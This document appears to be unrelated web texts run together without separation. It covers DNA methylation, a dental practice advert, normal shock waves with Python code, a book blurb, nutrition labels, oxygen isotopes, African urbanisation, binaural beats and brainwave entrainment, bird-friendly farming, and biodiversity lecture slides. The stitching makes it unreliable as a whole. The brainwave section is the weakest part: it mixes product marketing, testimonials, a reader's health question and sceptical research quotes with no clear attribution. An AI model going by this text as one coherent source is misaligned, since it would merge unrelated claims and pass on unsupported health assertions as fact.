samples of matched controls. Our new method allows robust analysis of LINE-1 DNA methylation from as few as 500 cells of starting material, as well as sensitive identification of alterations in DNA methylation, even within subsets of LINE-1 elements.
In some ways, tooth loss is natural. For instance, if you ignore a dental disease, then the consequences of it will naturally lead to the loss of your teeth. However, it isn’t natural in the same sense as aging. Unlike growing older, you can largely prevent tooth loss from occurring with proper care and maintenance, and by addressing dental health concerns promptly. At our El Paso, TX, dental office, we not only help you prevent tooth loss, but also help you prevent further concerns if tooth loss occurs by designing a custom, highly lifelike tooth replacement.
Your other teeth try to take up the slack
Losing a tooth means that the rank and file of your teeth loses a supporting member. The teeth closest to the gap can feel the pressure every time you bite and chew, and can shift toward the space in an effort to compensate for it. This can lead to a host of issues, including forced tooth misalignment, structurally weaker teeth, a higher risk of tooth decay, and ultimately, an increased risk of losing more teeth. To avoid this, we can fill the gap in your smile with a lifelike dental bridge, or with a dental implant-supported crown that replaces your lost tooth root, as well.
Your risks of further tooth loss increase
Shifting teeth aren’t the only thing that can increase your risks of further tooth loss. For instance, losing a tooth root means losing stimulation in your jawbone, which can result in diminished minerals and nutrients flowing to it. Over time, your jawbone may shrink as it loses mass and density, making it weaker and less able to fully support your remaining teeth. The only way to prevent this is to reestablish that stimulation with an appropriate number of dental implants. The implant posts mimic your healthy teeth roots by supporting your custom crown, bridge, or denture, as well as helping your jawbone maintain its flow of nutrients.
Your oral and facial structures can suffer
As your jawbone shrinks from lack of stimulation, it will eventually become visibly apparent in your facial appearance. The jaw, cheekbones, and surrounding oral and facial structures can begin to sag due to inadequate support, a condition commonly referred to as facial collapse. By replacing your lost teeth with dental implants, you not only preserve your jawbone, but also the aforementioned structures to help you preserve your smile’s and face’s youthful appearance.
Don’t ignore tooth loss any longer
Avoid the more serious consequences of tooth loss by restoring your smile with a lifelike replacement as soon as possible. To learn more, schedule a consultation by
calling the Sunny Smiles dental office nearest you in El Paso, TX, today! We also have offices in Chaparral, Canutillo, and Vinton so we can easily serve patients throughout all surrounding communities.
A normal shock is a shock wave perpendicular to the flow direction. Its location depends on the variation in the cross-sectional flow area of the duct, as well as on the upstream and downstream boundary conditions.

[Figure: a normal shock wave in a duct.]
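The jump in flow properties across a normal shock follows the classic one-dimensional relations for a calorically perfect gas. A hedged sketch (these are the standard textbook normal-shock equations, not taken from this page; γ = 1.4 assumes air):

```python
import math

def normal_shock(M1: float, gamma: float = 1.4):
    """Downstream Mach number and static pressure ratio across a
    normal shock in a calorically perfect gas (standard relations)."""
    if M1 <= 1.0:
        raise ValueError("A normal shock requires supersonic upstream flow (M1 > 1)")
    # M2^2 = (1 + (g-1)/2 * M1^2) / (g*M1^2 - (g-1)/2)
    M2_sq = (1 + 0.5 * (gamma - 1) * M1**2) / (gamma * M1**2 - 0.5 * (gamma - 1))
    # p2/p1 = 1 + 2g/(g+1) * (M1^2 - 1)
    p_ratio = 1 + 2 * gamma / (gamma + 1) * (M1**2 - 1)
    return math.sqrt(M2_sq), p_ratio

M2, pr = normal_shock(2.0)
print(f"M2 = {M2:.4f}, p2/p1 = {pr:.2f}")  # M2 = 0.5774, p2/p1 = 4.50
```

For an upstream Mach number of 2 in air, the flow behind the shock is subsonic (M2 ≈ 0.577) and the static pressure jumps by a factor of 4.5, which matches the tabulated values found in gas-dynamics references.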
Summary

The 'material turn' in critical theory, and particularly the turn towards the body coupled with scientific insights from biomedicine, biology and physics, is becoming an important path in fields of humanities-based scholarly inquiry. Material and technological philosophies play an increasingly central role in disciplines such as literary studies, cultural studies, history, performance and aesthetics, to name only a few. This edited collection of essays investigates how the material turn finds applications within humanities-based frameworks, focusing on practical reflections and disciplinary responses. It takes as its critical premise the understanding that importation of theoretical viewpoints is never straightforward; rather, a complex, sometimes even fraught, communication takes place between these disciplines at the imperceptible lines where praxis and theory meet, transforming both the landscape of practical engagement and the models of material theory. Presenting a multi- and interdisciplinary consideration of current research on the cultural relationship to living (and non-living) bodies, Corporeality and Culture: Bodies in Movement puts the body in focus. From performance and body modification to film, literature and other cultural technologies, this volume undertakes a significant speculative mapping of the current possibilities for engagement, transformation and variance of embodied movement in relation to scientifically-situated corporealities and materialities in cultural and artistic practices. Time and time again, it finds these ever-shifting modes of being to be inextricably interdependent and coextensive: movement requires embodiment; and embodiment is a form of movement.
Reviews

'For well over a decade the turn to the body has complicated any straightforward conception of social construction or biologism. The essays collected in Corporeality and Culture transform the fields of gender studies and cultural studies in surprising and astute ways. Focused on important ethical and political questions these essays will be highly valuable and fascinating reading for anyone interested in contemporary culture and the difficulties of thinking about the politics of embodiment.' Claire Colebrook, Penn State University, USA

'Corporeality and Culture is a next-generation volume in feminist theory and queer studies. The editors write how they have modestly witnessed the making of new materialisms in academia and art, and readers will find themselves in the position of the modest witness to a new twist in the turn towards post-humanist and affect theory, phenomenology and Deleuze Studies. The individual essays survey contemporary corporeality across theory and a multitude of artistic practices.' Iris van der Tuin, Utrecht University, The Netherlands

'Here a new generation of scholars address the motion, e-motion and sheer commotion of bodies in states of becoming and relation. Resisting any conception of the body as unity or totality, this collection constructs new cartographies emphasising difference, mutability, porosity and the undecidably in-between. This is adventurous, exploratory, experimental work, refusing to be bound to programs of any kind; this is thinking on the move towards unanticipated possibilities and unpredictable outcomes.' Anna Gibbs, University of Western Sydney, Australia
In the study, the researchers investigated how looking at nutrition labels affected the dietary intakes of over 1,000 university students. The participants were asked to answer whether they usually read nutrition labels on packaged foods. With their answers, they were classified as label-users or non-users. Their adherence to the Mediterranean diet was also evaluated using the relative Mediterranean Diet Score (rMED), in which positive scores are attributed to fruits, vegetables, legumes, fish, olive oil, and cereals. On the other hand, negative scores are attributed to meat and dairy products. Then, the total rMED scores were classified into three groups designating low, medium, and high adherence.
“Our approach contributes to exploring the role of nutritional labels use as a suitable tool to make healthier food choices from a different wider perspective based on dietary patterns such as Mediterranean Diet (MD), which can also indicate an overall healthy lifestyle,” said lead researcher Professor Manuela García-de-la-Hera.
Results of the study revealed that 58 percent of the population used nutrition labels. Label-users had a closer adherence to a Mediterranean-type of diet than non-users. In addition, label-users were also found to eat higher amounts of fruits, vegetables, and fish, and consumed less meat compared to non-users of labels.
In a sub-analysis, 738 of the participants were asked about their reasons for reading or not reading nutrition labels. Those who read labels reported that they did so mainly out of health concerns (e.g., adherence to a healthy diet, weight loss, or weight management). Conversely, those who admitted to not reading labels said they did not have enough time or were simply not interested.
“Our data are far from being able to establish a possible causal link between nutrition label use and higher adherence to MD, but they constitute a suitable rationale for replicating in other samples. Therefore, additional large-scale longitudinal studies are necessary to corroborate our findings and explore other aspects not covered in this study, such as nutritional knowledge, consumer preferences, or participant skills,” the researchers said.
Things you need to know about reading and understanding nutrition labels
Reading the nutritional information on the back of a packaged food may not be easy. Moreover, some people do not have the time to check the labels. Furthermore, brands use clever and misleading ways to convince buyers to buy their products. (Related: Nutrition labels confuse food shoppers; calls for simpler labels intensify.)
Here are three things you need to look for when reading a food label:
- Check the ingredient list. Ingredients on nutrition labels should be listed in descending order according to weight. Thus, if the first three ingredients include sugar or highly processed ingredients, you would not want to buy that product.
- Watch out for hidden sugars. Manufacturers can use different sugars with names that you would not recognize. In addition to "sugar" words, look for other terms such as invert sugar, dextrose, maltol, fructose, sucrose, syrup, and maltodextrin.
- Keep an eye on buzzwords. Manufacturers can trick you into thinking that their products are healthy with their labels. Some of the buzzwords they use include sugar-free, gluten-free, low-carb, low-fat, low-calorie, organic, natural, light, and fruit-flavored. They use other ingredients and chemicals to produce a similar flavor. For example, "sugar-free" products may use artificial sweeteners as an alternative, which can be more harmful in reality. Therefore, check the nutrition label carefully.
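The "hidden sugars" check above is mechanical enough to automate. An illustrative Python sketch that flags the sugar aliases listed in the article in an ingredient string (the alias list is not exhaustive, and the sample label is invented):

```python
# Sugar aliases named in the article; real labels use many more.
SUGAR_ALIASES = {
    "sugar", "invert sugar", "dextrose", "maltol", "fructose",
    "sucrose", "syrup", "maltodextrin",
}

def find_hidden_sugars(ingredients: str) -> list[str]:
    """Return the sugar aliases found in an ingredient list string."""
    text = ingredients.lower()
    return sorted(alias for alias in SUGAR_ALIASES if alias in text)

# Hypothetical label, for illustration only:
label = "Whole grain oats, maltodextrin, salt, brown rice syrup, natural flavor"
print(find_hidden_sugars(label))  # ['maltodextrin', 'syrup']
```

A simple substring match like this will over-flag (e.g., "sugar" also matches "invert sugar"), which is arguably the right bias for a consumer checklist.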
Oxygen has contributed to our understanding of the evolution of life on Earth by providing invaluable clues to geological processes — yet it still holds the key to some unsolved mysteries, as
Mark H. Thiemens explains.
Long before oxygen bars made it cool, element number 8 was somewhat magical. In the nucleus, there exist levels that when filled provide additional nuclear stability beyond that expected from normal binding-energy considerations, much like the filled shells of the noble gases for electrons. These nuclear 'magic numbers' occur at proton or neutron numbers of 2, 8, 20, 28, 50, 82 and 126. Consequently, oxygen's most common isotope (16O), with its eight protons and eight neutrons, is 'doubly magic'. This accounts for its abundance — it is the third most abundant element in the universe after hydrogen and helium.
During nucleosynthesis, in which protons and neutrons organize to form atomic nuclei in stars, three 4He nuclei combine to form 12C — a two-step process, with two 4He nuclei forming 8Be that in turn fuses with the third 4He. 12C is subsequently converted into 16O by further fusion with another helium nucleus.
Positioned at group 16 and period 2 in the periodic table, oxygen is an unusually reactive non-metallic atom that forms compounds with nearly all other elements. Its cosmic abundance combined with its chemical properties lead to its participation in a range of processes that build or protect planets (as part of silicate material or through the allotrope ozone, respectively) construct living organisms (in DNA, proteins, lipids and carbohydrates), as well as serving metabolic roles (photosynthesis and respiration). It is ubiquitous in the Earth's crust, mantle, atmosphere and surface water, and biological reservoirs that are connected through oxygen transfer. Carbon dioxide — a dominant greenhouse gas — is a major agent of the transfer between these reservoirs.
Since its original discovery by Carl Wilhelm Scheele in Uppsala in 1773, and publication by Joseph Priestley two years later, oxygen has had a long and interesting history. Lavoisier played a major role in the identification of the process by which oxidation or combustion occurs — and provided oxygen with its name, borrowing Greek roots (
oxys and -genes) to refer to it as 'creator of acids' because he thought all acids contained oxygen. Oxygen's role throughout the history of civilization is extensive, from energy production (whether hydrological or as a general fuel oxidant) to agriculture and as a component of textiles and ceramics, as well as many drugs.
Going back further in time, oxygen is intimately associated with the origin and evolution of life. In the Precambrian era, atmospheric oxygen levels were significantly lower than now, probably less than 0.1% of the current ones — although it is still difficult to quantify this with precision. Using multi-isotope measurements of sulfur (ref. 1), these low oxygen levels were estimated to have occurred between about 3.8 and 2.7 billion years ago. Only a little later — 2.2–2.5 billion years ago — the 'Great Oxygenation Event' (ref. 2) occurred and oxygen levels abruptly rose, largely owing to activities of cyanobacteria, producing noticeable changes in the redox state and distribution of oxygen in minerals, such as the globally pervasive banded iron formations.
Measurements of oxygen isotopes (16O, 17O and 18O) have been crucial in resolving natural processes. Stemming from work in the Urey laboratory in the 1950s (refs 3,4), analyses of oceanic biological carbonates have been used to quantify the temperature change of the oceans over geological timescales. Similarly, the role of marine and terrestrial organisms in global photosynthesis, respiration and their change over time was deduced from measurements of atmospheric oxygen — which depend on the difference in the 18O to 16O ratio between air and water (the Dole effect).
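Isotope ratios like these are conventionally reported in delta notation, the per-mil deviation of a sample's 18O/16O ratio from a reference standard. A minimal sketch of the calculation; the VSMOW reference ratio used here is a standard literature value, not taken from this essay:

```python
# 18O/16O ratio of the VSMOW water standard (literature value, assumed).
R_VSMOW_18O = 0.0020052

def delta_18O(r_sample: float, r_standard: float = R_VSMOW_18O) -> float:
    """delta-18O in per mil: (R_sample / R_standard - 1) * 1000."""
    return (r_sample / r_standard - 1.0) * 1000.0

# A hypothetical sample slightly enriched in 18O relative to VSMOW:
print(f"{delta_18O(0.0020092):+.2f} per mil")  # +1.99 per mil
```

Positive values indicate enrichment in the heavy isotope relative to the standard; paleotemperature work of the kind pioneered in the Urey laboratory rests on how this quantity in carbonates varies with the temperature of the water they formed in.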
Since 1973, we have known that the oldest objects in the solar system — the calcium- and aluminium-rich inclusions of 'carbonaceous chondritic' meteorites — possess a multiple oxygen isotope distribution that is inconsistent with conventional isotope effects (ref. 5). Experiments a decade later suggested that this might be because of processes such as photochemical isotope self-shielding, or chemical reactions that depend on symmetry factors rather than the conventional mass effect, which can produce a similar anomalous isotopic distribution (ref. 6). Recently, however, measurements of solar wind samples collected by the spacecraft Genesis (ref. 7) — which may reflect the dominant reservoir of oxygen in the solar system — have shown that their isotopic distribution is not similar to that of meteorites.
This means that the oxygen isotopic distribution of the Sun may potentially not reflect the original distribution of the isotopic reservoir of meteorites and stony planets. Consequently, the nebular source of that original distribution, and how these celestial bodies went on to produce the current meteorites and planets, remain unresolved.
African urbanisation: An analytic policy guide
Africa is rapidly urbanising: it is the most important structural transformation underway in the region. By 2050, almost regardless of government policies, its urban population will have tripled. But the consequences are critically dependent upon policy choices: successful urbanisation requires active and far-sighted government. At its best, urbanisation can be the essential motor of economic development, rapidly lifting societies out of mass poverty. At its worst, it results in concentrations of squalor and disaffection which ferment political fragility.
To date, African urbanisation has been dysfunctional, the key indication being that cities have not generated enough productive jobs. If urban policies remain unchanged, future urbanisation is likely to result in similar outcomes. This paper sets out how changed policies can unlock the potential of urbanisation for prosperity. Primarily, it sets out the economic forces underlying this potential, and the specific policy actions they require. But policy actions do not just happen: they are generated by political processes that confer authority and capacity on public institutions. The paper concludes with a discussion of how politically urban policy-making might be improved.
Theta brainwaves occur most often in sleep but are also dominant in deep meditation. Theta is our gateway to learning, memory, and intuition. In theta, our senses are withdrawn from the external world and focused on signals originating from within. It is that twilight state which we normally only experience fleetingly as we wake or drift off to sleep. In theta we are in a dream; vivid imagery, intuition and information beyond our normal conscious awareness. It’s where we hold our ‘stuff’, our fears, troubled history, and nightmares.
Going deeper into a trance-like state of meditation, you enter the mysterious Theta state where brain activity slows almost to the point of sleep, but not quite. Theta is one of the more elusive and extraordinary realms you can explore. It is also known as the twilight state which you normally only experience fleetingly upon waking, or drifting off to sleep.
The gentle pulsating rhythms of Brain Sync audio programs act in a similar fashion, yet because the frequencies are precise and consistent they can be targeted to induce highly specific and desired brain states. Just as you can tune a radio to get a particular station, with Brain Sync technology you can re-tune your consciousness – effectively dialing your mind into a wide variety of brain states.

I have read something different about theta waves and learning languages. A University of Washington study tested students' resting brainwave activity before learning French. It found that students with a higher amount of beta/gamma and a lower amount of delta/theta activity were better at acquiring a second language. When you are dominant in theta, that is the lowest and most deeply relaxed awakened state you can be in. I think it would be much harder to really concentrate, fully understand and learn new information while in a theta state, so I would personally think twice about using theta while studying.

James Austin, a neurologist, began practicing Zen meditation during a visit to Japan. After years of practice, he found himself having to re-evaluate what his professional background had taught him. "It was decided for me by the experiences I had while meditating," said Austin, author of the book "Zen and the Brain" and now a philosophy scholar at the University of Idaho. "Some of them were quickenings; one was a major internal absorption: an intense hyper-awareness, empty endless space that was blacker than black and soundless and vacant of any sense of my physical bodily self. I felt deep bliss. I realized that nothing in my training or experience had prepared me to help me understand what was going on in my brain. It was a wake-up call for a neurologist."

Some studies have found that binaural beats can affect cognitive function positively or negatively, depending on the specific frequency that's generated.
For example, a study of long-term memory found that beta-frequency binaural beats improved memory, while theta-frequency binaural beats interfered with memory. This is something for scientists to continue to examine closely. For people who use binaural beats, it’s important to understand that different frequencies will produce different effects.
Brain wave entrainment is a real phenomenon and is useful as one method of investigating how the brain works. But there is no evidence, nor any theoretical basis, for any long lasting effect on brain function or that there is any benefit of any kind. Despite this, there is a huge industry of devices that claim to train your brain waves and have a beneficial effect. I wouldn’t waste a dime on any such device.
Infra-Low brainwaves (also known as Slow Cortical Potentials) are thought to be the basic cortical rhythms that underlie our higher brain functions. Very little is known about infra-low brainwaves. Their slow nature makes them difficult to detect and accurately measure, so few studies have been done. They appear to take a major role in brain timing and network function. Brainwave entrainment is a colloquialism for such 'neural entrainment', which is a term used to denote the way in which the aggregate frequency of oscillations produced by the synchronous electrical activity in ensembles of cortical neurons can adjust to synchronize with the periodic vibration of an external stimulus, such as a sustained acoustic frequency perceived as pitch, a regularly repeating pattern of intermittent sounds perceived as rhythm, or a regularly, rhythmically intermittent flashing light. At the heart of the critique of the new brain research is what one theologian at St. Louis University called the "nothing-butism" of some scientists: the notion that all phenomena could be understood by reducing them to basic units that could be measured. And finally, say believers, if God existed and created the universe, wouldn't it make sense that he would install machinery in our brains that would make it possible to have mystical experiences? "Neuroscientists are taking the viewpoints of physicists of the last century that everything is matter," said Mathew, the Duke psychiatrist. "I am open to the possibility that there is more to this than what meets the eye. I don't believe in the omnipotence of science or that we have a foolproof explanation."
It says the following: “Running a delta sleep session throughout the night is not recommended as it can interrupt the normal sleep cycle”. I’ve been looping pure delta isochronic tones for about 5 days now, and have had quality sleep. Should I continue looping delta or should I let the videos play out without looping them? Will it harm my health to loop delta while I sleep?
Research done under Gerald Oster suggested that binaural beats may be used as a medical tool, especially for diagnosing neurological conditions. In particular, he noticed that untreated sufferers of Parkinson’s disease were unable to “hear” binaural beats, but further research indicated successful treatment when the subject was finally able to perceive them at the end of a Parkinson’s treatment regimen. Oster also noted differences in perception in women based on their menstrual cycle, and posited that there may be some connection between the ability to perceive binaural beats and the woman’s levels of estrogen at the time.
I first became aware of brainwave meditation programs and brain waves when researching alternative methods for treating the bipolar disorder I had been unsuccessfully living with my entire adult life. I eventually learned a method of releasing difficult emotions on the spot, which I then practiced extensively, and consequently found it easier and even desirable to meditate for fairly lengthy periods of time. Though I took up meditation as a serious daily practice and experienced many undeniable benefits, I nonetheless intermittently experienced life-debilitating bouts of mania and severe depression, often resulting in chaotic mixed states and an inability to maintain daily social functions. During these times, it became nearly impossible to sit in meditation.
Binaural beats are auditory brainstem responses which originate in the superior olivary nucleus of each hemisphere. They result from the interaction of two different auditory impulses, originating in opposite ears, below 1000 Hz and which differ in frequency between one and 30 Hz (Oster, 1973). For example, if a pure tone of 400 Hz is presented to the right ear and a pure tone of 410 Hz is presented simultaneously to the left ear, an amplitude-modulated standing wave of 10 Hz, the difference between the two tones, is experienced as the two wave forms mesh in and out of phase within the superior olivary nuclei. This binaural beat is not heard in the ordinary sense of the word (the human range of hearing is from 20-20,000 Hz). It is perceived as an auditory beat and theoretically can be used to entrain specific neural rhythms through the frequency-following response (FFR)--the tendency for cortical potentials to entrain to or resonate at the frequency of an external stimulus. Thus, it is theoretically possible to utilize a specific binaural-beat frequency as a consciousness management technique to entrain a specific cortical rhythm. If you name your emotions, you can tame them, according to new research that suggests why meditation works. Brain scans show that putting negative emotions into words calms the brain's emotion center. That could explain meditation's purported emotional benefits, because people who meditate often label their negative emotions in an effort to let them go. I call the kind of intuitions and inspirations that come when we meditate and do these kinds of practices my “marching orders”: Okay, this is what I need to do. We’re not using our brilliant linear minds here; that’s not the place wisdom comes from.
The place of wisdom is, again, relaxing into these states with loving-kindness, and then all the stuff can come out, whether we are dealing with our shadow issues or dealing with our light issues—the wisdom and gifts we haven’t yet brought forth that need to be birthed. If mind-consciousness is not the brain, why then does science relate states of consciousness and mental functioning to Brainwave frequencies? And how is it that audio with embedded binaural beats alters brain waves? The first question can be answered in terms of instrumentation. There is no objective way to measure mind or consciousness with an instrument. Mind-consciousness appears to be a field phenomenon which interfaces with the body and the neurological structures of the brain (Hunt, 1995). One cannot measure this field directly with current instrumentation. On the other hand, the electrical potentials of brain waves can be measured and easily quantified. Contemporary science likes things that can be measured and quantified. The problem here lies in oversimplification of the observations. EEG patterns measured on the cortex are the result of electro-neurological activity of the brain. But the brain's electro-neurological activity is not mind-consciousness. EEG measurements then are only an indirect means of assessing the mind-consciousness interface with the neurological structures of the brain. As crude as this may seem, the EEG has been a reliable way for researchers to estimate states of consciousness based on the relative proportions of EEG frequencies. Stated another way, certain EEG patterns have been historically associated with specific states of consciousness. It is reasonable to assume, given the current EEG literature, that if a specific EEG pattern emerges it is probably accompanied by a particular state of consciousness. 
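The 400 Hz / 410 Hz example described above is easy to make concrete in code. The sketch below (assuming NumPy is available; the sample rate and duration are arbitrary illustrative choices) builds the two pure tones as separate stereo channels. Note that in true binaural presentation neither channel physically contains a 10 Hz modulation; the beat only becomes a physical amplitude envelope if the tones are mixed into a single (monaural) channel.

```python
import numpy as np

SAMPLE_RATE = 44100          # samples per second (arbitrary choice)
DURATION = 2.0               # seconds
F_RIGHT, F_LEFT = 400, 410   # right ear 400 Hz, left ear 410 Hz, as in the text

t = np.arange(int(SAMPLE_RATE * DURATION)) / SAMPLE_RATE
left = np.sin(2 * np.pi * F_LEFT * t)    # tone presented to the left ear
right = np.sin(2 * np.pi * F_RIGHT * t)  # tone presented to the right ear

# True binaural presentation: two independent channels, each a pure tone.
# Channel 0 = left, channel 1 = right (a common stereo convention).
stereo = np.column_stack([left, right])

# The perceived beat rate is simply the frequency difference.
beat_hz = F_LEFT - F_RIGHT  # 10

# If the tones are physically mixed (a monaural beat), the waveform's
# amplitude envelope rises and falls at that 10 Hz difference frequency.
mixed = left + right
```

Writing `stereo` to a WAV file and listening over headphones would present each ear its own unmodulated tone; played through a single speaker, the `mixed` signal's 10 Hz envelope is audible as a tremolo-like pulsing.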
One can also learn to control and slow down their brain waves through various neurofeedback technologies such as electroencephalograph (EEG), galvanic skin response (GSR), and heart, pulse and breath rate monitors. These devices measure stress and relaxation parameters and then "play" back the signals to the user so they can use the signals as a beacon to guide and "steer" themselves into a relaxed state. This takes some time, work and discipline but is much quicker than learning meditation. I appreciate your compliment on my article Henry. I’ve been using and reading up on isochronic tones and brainwave entrainment for many years, so it was just a case of trying to put a lot of what I’ve learnt into one article. I don’t have a great deal of knowledge or experience in using hypnosis and subliminals, so I’m afraid I wouldn’t be in a position to create something so extensive in reviewing them.
This kind of conflicting evidence regarding the effectiveness of binaural beats to produce valid and reliable changes in brain waves abounds in the literature. For example, Rosenfeld, Reinhart, & Srivastava, (1997) found that in a sample of normal college students, alpha and beta audiovisual stimulation showed evidence of brainwave entrainment, but baseline levels of alpha and beta among the participants affected the observed degree of entrainment, producing significant individual differences in response. López-Caballero & Escera (2017) found that administration of binaural beats in the various frequency bands produced no changes in EEG spectral power between the time periods of baseline and those periods with beats presented. Likewise, Wahbeh, Calabrese, Zwickey, & Zajdel (2007) found no effect on brainwaves with the administration of alpha frequency binaural beats. It is easy, however, to find personal testimonials online.
Brain research is beginning to produce concrete evidence for something that Buddhist practitioners of meditation have maintained for centuries: Mental discipline and meditative practice can change the workings of the brain and allow people to achieve different levels of awareness. Those transformed states have traditionally been understood in transcendent terms, as something outside the world of physical measurement and objective evaluation.
Ancient cultures believed that sound waves of different frequencies and beats could induce a state of meditation. Ancient Hindus and Yogis believed that specific kinds of sound waves can induce relaxing effects. I found the best binaural beat app, BINAURAL BEATS - MEDITATION & RELAXATION - Apps on Google Play, as it is designed to provide you with the best meditation, deep sleep, stress relief, healing and sleep sounds. “Binaural beats are not very noticeable because the modulation depth (the difference between loud and quiet) is 3 dB, a two-to-one ratio. (Isochronic tones and mono beats easily have a 50 dB difference between loud and quiet, which is a 100,000-to-1 ratio.) This means that binaural beats are unlikely to produce a significant entrainment because they don’t activate the thalamus.” A common element in recordings incorporating alpha and theta frequencies is a steady but barely perceptible rhythm of the frequencies themselves. This subtle and calming pulse mixes with sounds of gentle breezes, distant bird songs, and the slow progression of deep synth notes. Underneath this, below the audible sounds at sub-16 hertz levels, other frequencies intermingle, deepening the merging of conscious and unconscious mind.
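The decibel figures in the quote above can be sanity-checked with the standard conversion from decibels to a linear power ratio, ratio = 10^(dB/10). A minimal sketch in plain Python (the function name is my own, not from any audio library):

```python
def db_to_power_ratio(db: float) -> float:
    """Convert a decibel difference to a linear power ratio."""
    return 10 ** (db / 10)

# 3 dB is roughly the "two-to-one ratio" quoted for binaural beats,
# and 50 dB is the 100,000-to-1 ratio quoted for isochronic tones.
print(round(db_to_power_ratio(3), 2))  # ~2.0
print(db_to_power_ratio(50))           # ~100000
```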
Conservation Column: Done Right, Farming Can Benefit Both Humans and Birds
Birds help farmers. They control pests, sow seeds, pollinate flowers, and fertilize soils. Unfortunately, the reverse is not true; common agricultural practices do not help birds. Often they have led to devastating bird population declines. North American Breeding Bird Survey data show that 74 percent of farmland-associated species decreased between 1966 and 2013. The global human population is large and growing, bringing a concomitant increase in the number of mouths to feed. That means that large swaths of natural habitat are destroyed to make way for agriculture. The remaining patches of native habitat are small and isolated. In addition, the chemicals used to increase crop yields are either interfering with reproduction in birds or killing them outright. Luckily, bird-friendly farming practices do exist.
Growing and buying organic food reduces risks from the many toxins used in conventional farming. Not only do some of these pesticides harm birds directly (pesticides such as neonicotinoids cause loss of body mass, neurological impairment, and reproductive failure), but they also decimate the insect food base of many birds. Ironically, the loss of birds and beneficial insects, in turn, increases the surplus of crop pests. Low-intensity farming, which uses fewer pesticides and allows for more natural habitat, provides many other benefits, such as soil conservation, improved water quality, and carbon storage.
Several scientific reports have detailed the benefits of planting and maintaining wildflower strips, hedgerows, and other areas of native vegetation on farms. Even though a small area is taken out of crop production, the practice can actually increase crop yield. Plantings support pollinators such as native bees, beneficial insects, and birds. Native bees and some birds improve productivity through their pollination services. Beneficial insects and birds control crop pests. In one recent study, farm-edge habitat that contained native plants supported nearly three times as many bird species as those without, and importantly, reduced the abundance of the most significant insect pests by over 33 percent. Another study noted that planting wildflower strips adjacent to a crop field led to a 40 percent reduction in crop damage due to beetles and other pests.
Protecting riparian or streamside areas, as well as wetlands located on farms, also supports greater biodiversity. Rice farmers in California used to burn the straw residue post harvest. Now they flood their fields, creating temporary wetlands that support migratory and residential birds. It’s another win-win situation. The presence of the birds increases the rate of straw decomposition and creates better planting conditions for the next season.
A 2019 long-term study in Costa Rica measured population declines in 69 out of 112 bird species. On the positive side, coffee plantations that had modest tree cover hosted more types of birds. Farms with an average of about 13 percent tree cover hosted double the number of forest specialist birds compared with plantations with an average of 7 percent tree cover. Other studies have revealed the merits of agroforestry, or shade-grown crops, such as coffee and cocoa. One found 1,216 species of birds using agroforests compared to 303 species using conventional farms. Several surveys of agroforests have documented greater species richness and abundance of individuals, as well as reduced soil erosion, increased carbon sequestration, improved pollination, better pest control, and better connectivity for the many animals that live in forests.
Other sustainable practices include smart water and soil management (such as no-till farming), and moving away from planting mono-crop fields. Many programs, including the US Conservation Reserve Program, will pay landowners to convert highly erodible cropland into wildlife habitat, but the program is underfunded and limited. Stronger government policies in the United States and across the globe are needed to promote more environmentally friendly agricultural practices. Farming can be for the birds as well as the people!
Biodiversity
How did biological diversity come about?
What are the principles of natural selection?
What affects biodiversity?

What is biological diversity?
1. genetic diversity
2. species diversity
3. higher taxonomic diversity (taxonomy)
4. habitat diversity

How many species exist in the world?
No one knows!
Taxonomists have named and described 1.4-1.7 million species
56% insects
14% plants
3% vertebrates
15% are in oceans
Highly biased sample
Vertebrates much more widely studied
What about microbes?
4000 different bacteria species per gram of Norwegian soil!
Also, taxonomy has mostly been done in Europe and N. America, while most of the biodiversity is in tropical countries and in oceans.

So how many species are there?
About 1.7 million species have been identified in total; roughly 14 million are estimated to exist, though this number could be as high as 100,000,000. Global biodiversity seems to be at its peak.

Where are these species?
Oceans
1 to 10 million in oceans
diverse in phyla
32 in oceans but only 12 phyla on land
Tropics
7% of land mass
50% of species

Slide 6: How do species evolve?
Evolution is the change in the genetic characteristics of a population over time.
This change may happen by:
genetic mutations
natural selection
geographic isolation and migration
genetic drift (most likely in small, isolated populations)

Slide 7: Views of Species Change: Evolution
Lamarck (1809)
Use and disuse
Inheritance of acquired characteristics
Charles Darwin (1859)
Alfred Wallace
Organisms today descended by gradual changes from ancient ancestors.
Age of the Earth: uranium-238 has a half-life of 4.5 billion years; the amount currently present suggests Earth is ~4.6 billion years old (…so what?)

Slide 8: Principles of Natural Selection
Genetic variation exists among organisms in a population; these variations are inheritable.
Populations produce more offspring than environment can support and therefore only a fraction survive (struggle for existence)
Individuals best adapted to environment (more “fit”) will survive and leave more offspring
…..“Survival of the fittest”

Examples of natural selection
Moths: “industrial melanism”
DDT and mosquitos
What is “fit” changes with a changing environment

Galapagos finches
Variety of finches filling many ecological niches
Ground feeders, flower and fruit feeders, insectivores, woodpecker finch, warbler finch
Evolutionary divergence in < 3 million years

Island speciation in Galapagos finches
Some islands have only one species
No competition for seeds
beak sizes have a larger range of variation
“Generalists” Other islands have > 1 species
Competition for seeds
Leads to character displacement to reduce competition
“Specialists”

Character displacement and biodiversity
Helps explain how so many species are able to coexist
Competitive exclusion principle: Two species that have exactly the same requirements (niches) cannot coexist in the same habitat.
However, species that require the same resources can coexist by utilizing those resources under different environmental conditions (or niches)
Also called “resource partitioning” or “niche partitioning”

Slide 13: Speciation
Speciation = origin of new species
Central phenomenon of evolution
Evolution ≠ speciation
When is a subpopulation defined as a new species?
How do genes usually flow through a population?
Reproductive isolation prevents gene flow and allows 2 populations to become distinct.

Slide 14: Geographic isolation and migration
If two populations are geographically isolated from each other for a long time, they may change so much that they cannot reproduce.

Genetic drift
Changes in the frequency of a gene in a population due to chance (not mutation, natural selection, or migration).
Mostly an issue in small populations (endangered species)
Genetic variability is low in small populations, so their ability to adapt to future changes in the environment is low.

Where can we expect to find high or low biodiversity?

Higher diversity in complex environments
Larger number of niches in heterogeneous environments
Also, high diversity at a supporting trophic level leads to high diversity.

Slide 18: “Paradox of the Plankton”
Seemingly simple environment, many species, no competitive exclusion
environmental complexity can still account for significant portion of diversity
Need just two limiting resources

Slide 20: Environments can be complex when a spatial component is added

Slide 21: Highest diversity at intermediate disturbance levels
Intermediate Disturbance Hypothesis
low disturbance, competitors dominate
High disturbance, only a few stress-tolerators

Slide 22: Highest Diversity in Low Nutrient Environments

What leads to low diversity?
Environmental stress, extreme environments, extreme disturbance, or limitation of an essential resource
Geographic isolation (real or ecological islands)
Recent introductions of exotic species
